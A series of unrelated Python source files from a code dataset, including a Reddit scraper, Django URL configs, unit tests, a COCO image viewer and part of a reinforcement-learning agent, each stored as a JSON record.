{"seq_id":"599813965","text":"\"\"\"\nScraper for /r/changemyview data\n\"\"\"\n\nimport os\nimport time\nimport pickle\nimport numpy as np\nimport pandas as pd\nimport praw\nimport argparse\nfrom utils import can_fail\nfrom cmv_types import GatherSub, GatherCMVSub, GatherComment, GatherCMVComment, GatherCMVSubAuthor\nfrom cmv_tables import init_tables\n\n# sqlalchemy imports\nimport sqlalchemy\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\n\nEND_2016 = 1483228800\nSTART_2013 = 1356998400\nSTART_2015 = 1420070400\nSTART_2016 = 1451606400\nJAN_20_2016 = 1453334399\nJAN_4_2016 = 1451811999\nMID_2016 = 1464739200\n\nSTART_BDAY_2016 = 1461110400\nEND_BDAY_2016 = 1461130000\n\n\n\n\n\n\nclass CMVScraper:\n \"\"\"\n Class to scrape /r/changemyview for MACS 302 and possibly thesis.\n \"\"\"\n def __init__(self, start_date, end_date, new_tables, pwd_file, \n cmv_com_content, all_com_content, echo):\n \"\"\"\n Initializes the class with an instance of the praw.Reddit class.\n \"\"\"\n self.cmv_com_content = cmv_com_content\n self.all_com_content = all_com_content\n with open(pwd_file, 'r') as f:\n password = f.read()[:-1]\n\n # sqlalchemy connection\n self.engine = sqlalchemy.create_engine('mysql://jmcclellan:{}@mpcs53001.cs.uchicago.edu/jmcclellanDB?charset=utf8'.format(password), echo=echo)\n session = sessionmaker(bind=self.engine)\n self.session = session()\n if new_tables:\n CMVScraper.init_tables(self.engine)\n\n # PRAW objects\n self.praw_agent = praw.Reddit(\"cmv_scrape\", # Site ID\n user_agent = \"/u/shugamoe /r/changemyview scraper\")\n self.subreddit = self.praw_agent.subreddit(\"changemyview\")\n\n self.praw_agent.read_only = True # We're just here to look\n\n # Start and end dates of interest\n self.date_start_date = start_date\n self.date_end_date = end_date\n\n # If more than a day between start_date and end_date break up the date into\n # approximately day sized chunks to avoid 503 error.\n if end_date - start_date > 86400:\n self.date_chunks = np.ceil(np.linspace(start_date, end_date, num=\n int((end_date - start_date) / 85400)))\n\n # Example instances to tinker with\n self.eg_submission = self.praw_agent.submission(\"5kgxsz\")\n self.eg_comment = self.praw_agent.comment(\"cr2jp5a\")\n self.eg_user = self.praw_agent.redditor(\"RocketCity1234\")\n\n def look_at_comment(self, 
com_id):\n \"\"\"\n \"\"\"\n return self.praw_agent.comment(com_id)\n\n def look_at_submission(self, sub_id):\n \"\"\"\n \"\"\"\n return self.praw_agent.submission(sub_id)\n\n @staticmethod\n def init_tables(engine):\n \"\"\"\n Create new tables in db\n \"\"\"\n init_tables(engine)\n\n @staticmethod\n def arg_parser():\n \"\"\"\n Handles arguments for CLI\n \"\"\"\n parser = argparse.ArgumentParser(description=\"Scrape CMV Submissions and author information\")\n parser.add_argument(\"--start_date\", \"-s\", default=START_2016, type=int,\n help=\"Start Date (UTC Epoch) of CMV Submissions to gather\")\n parser.add_argument(\"--end_date\", \"-e\", default=JAN_4_2016, type=int,\n help=\"End Date (UTC Epoch) of CMV Submissions to gather\")\n parser.add_argument(\"--new_tables\", action=\"store_true\", default=False,\n help=\"Creates new tables in the database\")\n parser.add_argument(\"--pwd_file\", type=str, default=\"pwd.txt\",\n help=\"File containing the password\")\n parser.add_argument(\"--cmv_com_content\", type=bool, default=True,\n help=\"Gather the content of CMV Comments\")\n parser.add_argument(\"--all_com_content\", type=bool, default=False,\n help=\"Gather the content of All Comments\")\n parser.add_argument(\"--echo\", action=\"store_true\", default=False,\n help=\"Echo sqlalchemy engine\")\n\n parser_args = parser.parse_args()\n\n return parser_args\n\n @can_fail\n def scrape_submissions(self):\n \"\"\"\n This function gathers the submission IDs for submissions in\n /r/changemyview\n \"\"\"\n @can_fail\n def scrape_submissions_between(self, date_start_date, date_end_date):\n \"\"\"\n \"\"\"\n date_start_date_string = (\n time.strftime('%Y-%m-%d %H:%M:%S', time.gmtime(date_start_date)))\n date_end_date_string = (\n time.strftime('%Y-%m-%d %H:%M:%S', time.gmtime(date_end_date)))\n print(\"Gathering {} to {}\".format(date_start_date_string, date_end_date_string))\n\n for sub_instance in self.subreddit.submissions(date_start_date, date_end_date):\n GatherCMVSub(sub_instance, self).save_to_db()\n\n if hasattr(self, \"date_chunks\"):\n print(\"Time window too large, gathering submissions in chunks\")\n second_last_index = len(self.date_chunks) - 1\n for i in range(second_last_index):\n if i == 0:\n date_start_date = self.date_chunks[i]\n date_end_date = self.date_chunks[i + 1]\n else:\n date_start_date = self.date_chunks[i] + 1\n date_end_date = self.date_chunks[i + 1]\n scrape_submissions_between(self, date_start_date, date_end_date)\n # num_subs_gathered = len(self.cmv_subs)\n # print(\"{} submissions gathered\".format(num_subs_gathered))\n else:\n scrape_submissions_between(self, self.date_start_date, self.date_end_date)\n\n\n def scrape_author_histories(self):\n \"\"\"\n \"\"\"\n \n def scrape_author_history(author):\n \"\"\"\n \"\"\"\n print(\"Retrieving history for: {}\".format(author))\n SubAuthor = GatherCMVSubAuthor(author, self)\n SubAuthor.get_history_for(\"comments\")\n SubAuthor.get_history_for(\"submissions\")\n SubAuthor.save_to_db()\n\n get_auth_hist_vrized = np.vectorize(scrape_author_history,\n otypes=\"?\") # otypes kwarg to avoid double appplying func\n get_auth_hist_vrized(np.array([cmv_sub.author for cmv_sub in self.session.query(GatherCMVSub.sqla_mapping)]))\n\n\n @staticmethod\n def make_output_dir(dir_name):\n \"\"\"\n Creates an output directory in current folder if it does not exist\n already and returns the current directory\n \"\"\"\n cur_path = os.path.split(os.path.abspath(__file__))[0]\n output_fldr = dir_name\n output_dir = os.path.join(cur_path, 
output_fldr)\n if not os.access(output_dir, os.F_OK):\n os.makedirs(output_dir)\n\n return output_dir\n\n\ndef main():\n \"\"\"\n \"\"\"\n args = CMVScraper.arg_parser()\n print(args)\n global smodder \n smodder = CMVScraper(**vars(args))\n smodder.scrape_submissions()\n smodder.scrape_author_histories()\n\n\nif __name__ == \"__main__\":\n main()\n \n# SMODDER.update_cmv_submissions()\n# SMODDER.update_author_history()\n# with open(\"test.pkl\", \"wb\") as output:\n# pickle.dump(SMODDER, output)\n","sub_path":"a3/sql_file_production/scrape_cmv.py","file_name":"scrape_cmv.py","file_ext":"py","file_size_in_byte":7297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"166534331","text":"import os\nimport time\n\nt0 = time.time()\n\n\nfor batch_size in [10000, 30000, 50000]:\n for lr in [0.005, 0.01, 0.02]:\n os.system(f\"python cs285/scripts/run_hw2.py --env_name HalfCheetah-v2 --ep_len 150 \\\n--discount 0.95 -n 100 -l 3 -s 32 -b {batch_size} -lr {lr} -rtg --nn_baseline \\\n--exp_name q4_search_b{batch_size}_lr{lr}_rtg_nnbaseline\")\n\nt1 = time.time()\n\nprint(\"Total experiment time elapsed: \", t1 - t0)\n\n\n# python cs285/scripts/run_hw2.py --env_name InvertedPendulum-v2 \\\n# --ep_len 1000 --discount 0.9 -n 100 -l 2 -s 64 -b 500 -lr 0.1 -rtg \\\n# --exp_name q2_b500_r0.1","sub_path":"hw2/cs285/scripts/experiment4a.py","file_name":"experiment4a.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"175177876","text":"#!/usr/bin/env python3\n# coding: utf-8\n\nfrom __future__ import print_function\n\nimport logging, argparse\nimport sys, socket\n\nimport ctypes\nfrom sdl2 import *\n\nfrom proto import handShake, initialize, updateScreen\nfrom util import read8, read16, read32\n\ndef parseArgs():\n parser = argparse.ArgumentParser(description='Secure Android client')\n parser.add_argument('--host', default='127.0.0.1')\n parser.add_argument('--port', default=6088, type=int)\n parser.add_argument('--log', default='WARNING')\n args = parser.parse_args()\n return args\n\ndef main():\n args = parseArgs()\n\n loglvl = getattr(logging, args.log.upper(), None)\n logging.basicConfig(level=loglvl)\n\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((args.host, args.port))\n\n # handshake and initialize\n handShake(s)\n width, height, name = initialize(s)\n logging.debug(\"{0}, {1}, {2}\".format(width, height, name))\n\n # create the window\n SDL_Init(SDL_INIT_VIDEO)\n window = SDL_CreateWindow(\"Client: {0}\".format(name).encode('utf8'),\n SDL_WINDOWPOS_CENTERED, SDL_WINDOWPOS_CENTERED,\n width, height, SDL_WINDOW_SHOWN)\n renderer = SDL_CreateRenderer(window, -1, SDL_RENDERER_ACCELERATED)\n texture = SDL_CreateTexture(renderer,\n SDL_PIXELFORMAT_RGB565,\n SDL_TEXTUREACCESS_STREAMING,\n width, height)\n\n running = True\n event = SDL_Event()\n while running:\n while SDL_PollEvent(ctypes.byref(event)) != 0:\n if event.type == SDL_QUIT:\n running = False\n print(\"quit\")\n break\n\n # get the type of current message\n t = read16(s)\n\n logging.debug(\"Type: {0}\".format(t))\n\n if t == 0:\n x = read16(s)\n y = read16(s)\n w = read16(s)\n h = read16(s)\n bpp = read16(s)\n\n rect = SDL_Rect()\n rect.x = x\n rect.y = y\n rect.w = w\n rect.h = h\n\n # update the texture using the received buffer\n buf = updateScreen(s, x, y, w, h, bpp)\n SDL_UpdateTexture(texture, rect, buf, w * bpp);\n\n # draw the texture\n SDL_RenderClear(renderer)\n 
SDL_RenderCopy(renderer, texture, None, None)\n SDL_RenderPresent(renderer)\n\n s.close()\n SDL_DestroyTexture(texture)\n SDL_DestroyRenderer(renderer)\n SDL_DestroyWindow(window)\n SDL_Quit()\n\n return 0\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","sub_path":"SDL-work/client/scclient.py","file_name":"scclient.py","file_ext":"py","file_size_in_byte":2634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"590550196","text":"# -*- coding: utf-8 -*-\n# For text in funding.investors that is not yet linked: if it can be matched to an investment firm's registered business name, replace it with the short name and record the link in funding_investor_rel\n# Note that one firm may invest through multiple funds, so results must be deduplicated\n\nimport os, sys\nimport json, time\n\nreload(sys)\nsys.setdefaultencoding(\"utf-8\")\n\nsys.path.append(os.path.join(os.path.split(os.path.realpath(__file__))[0], '../util'))\nimport loghelper, db\n\n#logger\nloghelper.init_logger(\"funding_investor_structuring\", stream=True)\nlogger = loghelper.get_logger(\"funding_investor_structuring\")\n\n\ndef process():\n id = -1\n conn = db.connect_torndb()\n fullnames = conn.query(\"select a.investorId,a.name,i.website,i.name as shortname from investor_alias a \"\n \" join investor i on a.investorId=i.id\"\n \" where a.type=12010 \"\n \" and (a.active is null or a.active='Y')\"\n \" and (i.active is null or i.active='Y')\"\n \" and a.verify='Y'\")\n while True:\n fs = conn.query(\"select * from funding where id>%s order by id limit 1000\", id)\n if len(fs) == 0:\n break\n for f in fs:\n funding_id = f[\"id\"]\n if funding_id > id:\n id = funding_id\n str_investors = f[\"investors\"]\n if str_investors is None or str_investors == \"\":\n continue\n logger.info(str_investors)\n investors = json.loads(str_investors.replace(\"\\n\",\",\"))\n\n _investors = []\n flag = False\n for s in investors:\n if s[\"type\"] == \"text\":\n text = s[\"text\"]\n if len(text) < 4:\n _investors.append(s)\n continue\n if contain_company_name(text) is False:\n _investors.append(s)\n continue\n names = find_all_investor_fullnames(fullnames, text)\n if len(names) > 0:\n #logger.info(text)\n #logger.info(names)\n result = structure(text, names)\n result = remove_dup(result)\n #logger.info(result)\n #logger.info(\"\")\n _investors.extend(result)\n flag = True\n else:\n _investors.append(s)\n else:\n _investors.append(s)\n\n if flag:\n logger.info(str_investors)\n _str_investors = json.dumps(_investors, ensure_ascii=False)\n logger.info(_str_investors)\n _str_raw_investors = gen_raw_str(_investors)\n logger.info(_str_raw_investors)\n logger.info(\"\")\n corp = conn.get(\"select * from company where id=%s\",f[\"companyId\"])\n logger.info(\"companyId: %s, companyName: %s\", corp[\"id\"], corp[\"name\"])\n conn.execute(\"set autocommit=0\")\n for inv in _investors:\n if inv[\"type\"] == \"investor\":\n rel = conn.get(\"select * from funding_investor_rel\"\n \" where (active is null or active='Y')\"\n \" and fundingId=%s and investorId=%s\",\n funding_id, inv[\"id\"])\n if rel is None:\n logger.info(\"insert rel: %s\", inv[\"text\"])\n conn.insert(\"insert funding_investor_rel(fundingId,investorId,createUser,verify,active,createTime) values(%s,%s,139,'Y','Y',now())\",\n funding_id, inv[\"id\"])\n conn.update(\"update funding set investorsRaw=%s, investors=%s where id=%s\",\n _str_raw_investors, _str_investors, funding_id)\n conn.execute(\"commit\")\n # exit()\n\n conn.close()\n\n\ndef gen_raw_str(result):\n raw = \"\"\n for item in result:\n raw += item[\"text\"]\n return raw\n\n\ndef remove_dup(result):\n _result = []\n investorids = {}\n for item in result:\n if 
item[\"type\"] == \"text\":\n _result.append(item)\n else:\n if not investorids.has_key(item[\"id\"]):\n investorids[item[\"id\"]] = 1\n _result.append(item)\n last = _result[-1]\n if last[\"type\"] == \"text\" and (last[\"text\"].strip()==\"\" or\n last[\"text\"].strip()==\",\" or\n last[\"text\"].strip()==\",\" or\n last[\"text\"].strip() == \"、\"\n ):\n _result.pop(-1)\n return _result\n\n\ndef find_first_one(text, names):\n index = 65536\n first = None\n for name in names:\n i = text.find(name[\"name\"])\n if i>=0 and i<index:\n index = i\n first = name\n return first, index\n\n\ndef structure(text, names):\n results = []\n\n name, index = find_first_one(text, names)\n if name is None:\n if text.strip() != \"\":\n results.append({\n \"type\":\"text\",\n \"text\":text\n })\n return results\n\n if index > 0:\n results.append({\n \"type\": \"text\",\n \"text\": text[:index]\n })\n results.append({\n \"type\": \"investor\",\n \"text\": name[\"shortname\"],\n \"id\": name[\"investorId\"],\n \"link\": name[\"website\"],\n })\n text = text[(index+len(name[\"name\"])):]\n results.extend(structure(text,names))\n return results\n\ndef contain_company_name(text):\n if u\"公司\" in text or u\"合伙\" in text or u\"基金\" in text:\n return True\n return False\n\n\ndef find_all_investor_fullnames(fullnames, text):\n names = []\n while True:\n f = find_investor_fullname(fullnames, text)\n if f is None:\n break\n else:\n names.append(f)\n text = text.replace(f[\"name\"], \"\")\n return names\n\n\ndef find_investor_fullname(fullnames, text):\n for f in fullnames:\n if f[\"name\"] in text:\n return f\n return None\n\n\nif __name__ == \"__main__\":\n while True:\n logger.info(\"Start...\")\n process()\n logger.info(\"End.\")\n time.sleep(10*60)","sub_path":"data/patch/funding_investor_structuring.py","file_name":"funding_investor_structuring.py","file_ext":"py","file_size_in_byte":6451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"25951064","text":"# Tool binds\nbindk(key.paragraph, toggle_selection_type)\nbindc('1', tool_pen )\nbindc('2', tool_brush )\nbindc('3', tool_picker )\nbindc('4', tool_line )\nbindc('5', tool_spline )\nbindc('6', tool_rectangle)\nbindc('7', tool_ellipse )\nbindc('8', tool_polygon )\nbindc('9', tool_text )\nbindc('0', tool_fill )\n\n# Layer choice\nbindc('q', raster_layer )\nbindc('w', object_layer )\n\n# Convenient zoom\nbindc('a', zoom_in )\nbindc('z', zoom_out )\n\n# Misc\nbindk(key.space, select_top_object)\nbindc( 's', swap_colors)\nbindc( 'c', center_on_cursor )\nbindc( 'c', center_on_selected, mod.alt )\nbindc( 'x', pick_color_fg )\nbindc( 'i', context_flip_horizontal )\nbindc( 'j', context_flip_vertical )\nbindc( 'k', context_rotate_90CW )\n\ndef explorer_active_file():\n import subprocess\n filename = get_active_image().get_filename()\n if filename is not None:\n subprocess.Popen(r'explorer /select,\"%s\"' % get_active_image().get_filename())\nbindc('e', explorer_active_file )\n","sub_path":"tags/release-0.6/python/py/default_ini.py","file_name":"default_ini.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"146909569","text":"from django.urls import path\nfrom . 
import views\nfrom django.conf.urls import url\n\nurlpatterns = [\n path('',views.index),\n path('maths1',views.maths1),\n path('tc',views.tc),\n path('phy',views.phy),\n path('c',views.c),\n path('fit',views.fit),\n url(r'^activate/(?P<uidb64>[0-9A-Za-z_\\-]+)/(?P<token>[0-9A-Za-z]{1,13}-[0-9A-Za-z]{1,20})/$',\n views.activate, name='activate'),\n path('signup',views.signup),\n path('login',views.login_view),\n path('logout',views.logout_view),\n path('upload',views.add_notes)\n]","sub_path":"notes/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"365496808","text":"from django.conf.urls import url\nfrom portal import views\n\napp_name = 'portal'\nurlpatterns = [\n url(r'^$', views.index, name=\"index\"),\n url(r'^category/(?P<category_slug>[\\w\\-]+)/add_page/$', views.add_page, name=\"add_page\"),\n url(r'^category/(?P<category_slug>[\\w\\-]+)/$', views.detail, name=\"detail\"),\n url(r'^category/(?P<category_slug>[\\w\\-]+)/(?P<page_slug>[\\w\\-]+)/$', views.page_redirect, name=\"page_redirect\"),\n url(r'^add_category/$', views.add_category, name=\"add_category\"),\n url(r'^playground/$', views.playground, name=\"playground\"),\n]","sub_path":"portal/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"603027553","text":"import unittest\n\nimport find_my_cat\n\nimport mock\n\nfrom copy import deepcopy\n\n\nclass TestCatFinder(unittest.TestCase):\n def setUp(self):\n self.missing = 5\n self.connections, self.stations = find_my_cat.prepare_map_data()\n self.cf = find_my_cat.CatFinder(self.connections, self.stations, missing=self.missing)\n\n def test_prepare_map_data(self):\n \"\"\"\n Checking if data is being processed properly\n \"\"\"\n self.assertIsInstance(self.stations, dict)\n self.assertIsInstance(self.connections, dict)\n self.assertDictContainsSubset({'9': {'name': 'Arnos Grove', 'open': True}}, self.stations)\n self.assertItemsEqual(['212', '28', '83', '249', '94', '104', '163'], self.connections['11'])\n for k, v in self.connections.iteritems():\n self.assertNotIn(k, v)\n\n def test_cat_finder(self):\n \"\"\"\n Checking if CatFinder object is initialised as expected\n \"\"\"\n self.assertIsInstance(self.cf._lost_cats, dict)\n self.assertTrue(all((isinstance(e, basestring) for e in self.cf._lost_cats.values())))\n self.assertIsInstance(self.cf._owners_looking, dict)\n self.assertTrue(all((isinstance(e, list) for e in self.cf._owners_looking.values())))\n self.assertEqual(len(self.cf._lost_cats), self.missing)\n self.assertEqual(len(self.cf._owners_looking), self.missing)\n\n def test_cats_move(self):\n \"\"\"\n Checking if cats move unless they are on station with no connections\n \"\"\"\n cats_before = deepcopy(self.cf._lost_cats)\n self.cf._cats_move()\n for k, v in cats_before.iteritems():\n self.assertTrue(v != self.cf._lost_cats[k] or v not in self.cf._connections)\n\n def test_cats_not_move(self):\n \"\"\"\n Checking if cats do not move if they are on station with no connections\n \"\"\"\n self.cf._connections = {'1': []}\n self.cf._lost_cats = {'0': '1'}\n cats_before = deepcopy(self.cf._lost_cats)\n self.cf._cats_move()\n self.assertDictEqual(cats_before, self.cf._lost_cats)\n\n @mock.patch('random.choice')\n def test_cats_not_move_to_closed(self, random_choice):\n \"\"\"\n Checking if cats do not travel to closed 
stations\n \"\"\"\n self.cf._lost_cats = {'0': '1'}\n self.cf._connections = {'1': ['2', '3']}\n self.cf._stations = {'2': {'name': 'Black Cat', 'open': False},\n '3': {'name': 'White Cat', 'open': True}}\n self.cf._cats_move()\n random_choice.assert_called_with(['3'])\n\n def test_owners_move(self):\n \"\"\"\n Checking if owners move unless they are on station with no connections\n \"\"\"\n owners_before = deepcopy(self.cf._owners_looking)\n self.cf._owners_move()\n for k, v in owners_before.iteritems():\n self.assertTrue(v != self.cf._owners_looking[k] or not self.cf._connections[v[-1]])\n\n def test_owners_prefer_not_visited(self):\n \"\"\"\n Checking if owners travel rather to a station not visited before\n \"\"\"\n self.cf._connections = {'1': ['2', '5']}\n self.cf._owners_looking = {'0': ['2', '1']}\n owners_before = deepcopy(self.cf._owners_looking)\n self.cf._owners_move()\n for k, v in owners_before.iteritems():\n self.assertTrue(v != self.cf._owners_looking[k] or not self.cf._connections[v[-1]])\n\n def test_owners_not_move(self):\n \"\"\"\n Checking if owners do not move if they are on station with no connections\n \"\"\"\n self.cf._connections = {'1': []}\n self.cf._owners_looking = {'0': ['1']}\n owners_before = deepcopy(self.cf._owners_looking)\n self.cf._owners_move()\n self.assertDictEqual(owners_before, self.cf._owners_looking)\n\n def test_find_cats(self):\n \"\"\"\n Test finding cats\n \"\"\"\n station_found = '1'\n ls = {'0': station_found}\n self.cf._lost_cats = ls.copy()\n ol = {'0': ['2', station_found]}\n self.cf._owners_looking = ol.copy()\n self.assertTrue(self.cf._stations[station_found]['open'])\n self.cf._find_cats()\n self.assertEqual(self.cf._lost_cats, {})\n self.assertEqual(self.cf._owners_looking, {})\n self.assertEqual(self.cf._found_cats, ls)\n self.assertEqual(self.cf._owners_found, ol)\n self.assertFalse(self.cf._stations[station_found]['open'])\n\n def test_look_for_cats(self):\n \"\"\"\n Test main function running big search for cats\n \"\"\"\n cf = find_my_cat.CatFinder(self.connections, self.stations, missing=100)\n cf.look_for_cats()\n\n def test_calc_averages(self):\n \"\"\"\n Test calculating averages\n \"\"\"\n self.cf._owners_found = {}\n self.cf._owners_looking = {}\n self.assertTupleEqual(self.cf._calc_averages(), ('-', '-'))\n self.cf._owners_found = {0: range(5), 1: range(10)}\n self.cf._owners_looking = {0: range(4), 1: range(1)}\n self.assertTupleEqual(self.cf._calc_averages(), (5, 7.5))\n\n def test_get_trapped_numbers(self):\n \"\"\"\n Test getting numbers of trapped cats and owners\n \"\"\"\n self.cf._lost_cats = {'0': '1', '1': '1', '2': '2'}\n self.cf._owners_looking = {'0': ['2', '1'], '1': ['1', '2']}\n self.cf._connections = {'2': []}\n self.assertTupleEqual(self.cf._get_trapped_numbers(), (2, 1))\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"unittests/test_find_my_cat.py","file_name":"test_find_my_cat.py","file_ext":"py","file_size_in_byte":5509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"634686313","text":"from django.conf.urls import patterns, include, url\nfrom Indigo7.views import GridView, get_grid_data, \\\n get_grid_config\nfrom DHS.views import document_return_file\n\nurlpatterns = patterns('DHS.views', \n\n\n url(r'^$',\n GridView.as_view( \n template_name='DHS/list_grid.html',\n gridname='document_grid',\n gridurl='document_grid'), \n name='document_list'), \n \n url(r'^document_grid/$', \n get_grid_data, ({'module' :'DHS', 'objectname': 
'DocumentGrid', \n 'gridurl': 'document_grid'}), \n name='document_grid'),\n \n url(r'^document_grid/cfg/$', \n get_grid_config, ({'module' :'DHS', 'objectname': 'DocumentGrid',\n 'gridurl': 'document_grid'}), \n name='document_grid_config'), \n \n url(r'get_document/(?P<document_id>\\d+)$', document_return_file, name='get_document'), \n \n)","sub_path":"DHS/urlconf/documents.py","file_name":"documents.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"250684521","text":"from pycocotools.coco import COCO\nimport numpy as np\nimport skimage.io as io\nimport matplotlib.pyplot as plt\nimport pylab\n\npylab.rcParams['figure.figsize'] = (10.0, 8.0)\ndataDir='/home/iftimie/PycharmProjects/Human-Body-Part-Detector/datasets/coco'\ndataType='train2014'\nannFile='%s/annotations/instances_%s.json'%(dataDir,dataType)\ncoco=COCO(annFile)\n#\n# cats = coco.loadCats(coco.getCatIds())\n# nms=[cat['name'] for cat in cats]\n# print ('COCO categories: \\n\\n', ' '.join(nms))\n#\n# nms = set([cat['supercategory'] for cat in cats])\n# print ('COCO supercategories: \\n', ' '.join(nms))\n#\ncatIds = coco.getCatIds(catNms=['person','dog','skateboard']);\nimgIds = coco.getImgIds(catIds=catIds );\nimg = coco.loadImgs(imgIds[np.random.randint(0,len(imgIds))])[0]\n#\nI = io.imread('http://mscoco.org/images/%d'%(img['id']))\n# plt.figure(); plt.axis('off')\n# plt.imshow(I)\n# plt.show()\n#\n# plt.imshow(I); plt.axis('off')\n# annIds = coco.getAnnIds(imgIds=img['id'], catIds=catIds, iscrowd=None)\n# anns = coco.loadAnns(annIds)\n# coco.showAnns(anns)\n\nannFile = '%s/annotations/person_keypoints_%s.json'%(dataDir,dataType)\ncoco_kps=COCO(annFile)\n\nplt.imshow(I); plt.axis('off')\nax = plt.gca()\nannIds = coco_kps.getAnnIds(imgIds=img['id'], catIds=catIds, iscrowd=None)\nanns = coco_kps.loadAnns(annIds)\ncoco_kps.showAnns(anns)\n\nannFile = '%s/annotations/captions_%s.json'%(dataDir,dataType)\ncoco_caps=COCO(annFile)\n\nannIds = coco_caps.getAnnIds(imgIds=img['id']);\nanns = coco_caps.loadAnns(annIds)\ncoco_caps.showAnns(anns)\nplt.imshow(I); plt.axis('off')\nplt.show()","sub_path":"pyproject/loadImages.py","file_name":"loadImages.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"22076985","text":"import gym\nimport numpy as np\nimport tensorflow as tf\n\nimport learning.rl_agent as rl_agent\nimport util.net_util as net_util\nimport util.rl_path as rl_path\n\n'''\nAdvantage-Weighted Regression Agent\n'''\n\nclass AWRAgent(rl_agent.RLAgent):\n ADV_EPS = 1e-5\n\n def __init__(self, \n env,\n sess,\n\n actor_net_layers=[128, 64],\n actor_stepsize=0.00005,\n actor_momentum=0.9,\n actor_init_output_scale=0.01,\n actor_batch_size=256,\n actor_steps=1000,\n action_std=0.2,\n action_l2_weight=0.0,\n action_entropy_weight=0.0,\n\n critic_net_layers=[128, 64],\n critic_stepsize=0.01,\n critic_momentum=0.9,\n critic_batch_size=256,\n critic_steps=500,\n\n discount=0.99,\n samples_per_iter=2048,\n replay_buffer_size=50000,\n normalizer_samples=300000,\n\n weight_clip=20,\n td_lambda=0.95,\n temp=1.0,\n\n visualize=False):\n \n self._actor_net_layers = actor_net_layers\n self._actor_stepsize = actor_stepsize\n self._actor_momentum = actor_momentum\n self._actor_init_output_scale = actor_init_output_scale\n self._actor_batch_size = actor_batch_size\n self._actor_steps = actor_steps\n self._action_std = action_std\n self._action_l2_weight 
= action_l2_weight\n self._action_entropy_weight = action_entropy_weight\n\n self._critic_net_layers = critic_net_layers\n self._critic_stepsize = critic_stepsize\n self._critic_momentum = critic_momentum\n self._critic_batch_size = critic_batch_size\n self._critic_steps = critic_steps\n\n self._weight_clip = weight_clip\n self._td_lambda = td_lambda\n self._temp = temp\n \n self._critic_step_count = 0\n self._actor_steps_count = 0\n\n self._actor_bound_loss_weight = 10.0\n\n super().__init__(env=env,\n sess=sess,\n discount=discount,\n samples_per_iter=samples_per_iter,\n replay_buffer_size=replay_buffer_size,\n normalizer_samples=normalizer_samples,\n visualize=visualize)\n return\n\n def sample_action(self, s, test):\n n = len(s.shape)\n s = np.reshape(s, [-1, self.get_state_size()])\n\n feed = {\n self._s_tf : s\n }\n\n if (test):\n run_tfs = [self._mode_a_tf, self._mode_a_logp_tf]\n else:\n run_tfs = [self._sample_a_tf, self._sample_a_logp_tf]\n\n a, logp = self._sess.run(run_tfs, feed_dict=feed)\n\n if n == 1:\n a = a[0]\n logp = logp[0]\n return a, logp\n\n def eval_critic(self, s):\n n = len(s.shape)\n s = np.reshape(s, [-1, self.get_state_size()])\n\n feed = {\n self._s_tf : s\n }\n v = self._sess.run(self._critic_tf, feed_dict=feed)\n\n if n == 1:\n v = v[0]\n return v\n\n def train(self, max_iter, test_episodes, output_dir, output_iters):\n self._critic_step_count = 0\n self._actor_step_count = 0\n super().train(max_iter=max_iter, \n test_episodes=test_episodes,\n output_dir=output_dir, \n output_iters=output_iters)\n return\n\n def _build_nets(self):\n s_size = self.get_state_size()\n a_size = self.get_action_size()\n action_space = self.get_action_space()\n\n self._s_tf = tf.placeholder(tf.float32, shape=[None, s_size], name=\"s\")\n self._a_tf = tf.placeholder(tf.float32, shape=[None, a_size], name=\"a\")\n self._tar_val_tf = tf.placeholder(tf.float32, shape=[None], name=\"tar_val\")\n self._a_w_tf = tf.placeholder(tf.float32, shape=[None], name=\"a_w\")\n\n with tf.variable_scope(self.MAIN_SCOPE):\n with tf.variable_scope(self.ACTOR_SCOPE):\n self._norm_a_pd_tf = self._build_net_actor(self._get_actor_inputs())\n\n with tf.variable_scope(self.CRITIC_SCOPE):\n self._norm_critic_tf = self._build_net_critic(self._get_critic_inputs())\n self._critic_tf = self._val_norm.unnormalize_tf(self._norm_critic_tf)\n \n sample_norm_a_tf = self._norm_a_pd_tf.sample()\n self._sample_a_logp_tf = self._norm_a_pd_tf.log_prob(sample_norm_a_tf)\n self._sample_a_tf = self._a_norm.unnormalize_tf(tf.cast(sample_norm_a_tf, tf.float32))\n if (len(self._sample_a_tf.shape) == 1):\n self._sample_a_tf = tf.expand_dims(self._sample_a_tf, axis=-1)\n\n mode_norm_a_tf = self._norm_a_pd_tf.mode()\n self._mode_a_logp_tf = self._norm_a_pd_tf.log_prob(mode_norm_a_tf)\n self._mode_a_tf = self._a_norm.unnormalize_tf(tf.cast(mode_norm_a_tf, tf.float32))\n if (len(self._mode_a_tf.shape) == 1):\n self._mode_a_tf = tf.expand_dims(self._mode_a_tf, axis=-1)\n\n norm_a_tf = self._a_norm.normalize_tf(self._a_tf)\n if (isinstance(action_space, gym.spaces.Discrete)):\n norm_a_tf = tf.squeeze(norm_a_tf, axis=-1)\n norm_a_tf = tf.cast(norm_a_tf, tf.int32)\n self._a_logp_tf = self._norm_a_pd_tf.log_prob(norm_a_tf)\n return\n\n def _build_losses(self):\n norm_tar_val_tf = self._val_norm.normalize_tf(self._tar_val_tf)\n norm_val_diff = norm_tar_val_tf - self._norm_critic_tf\n 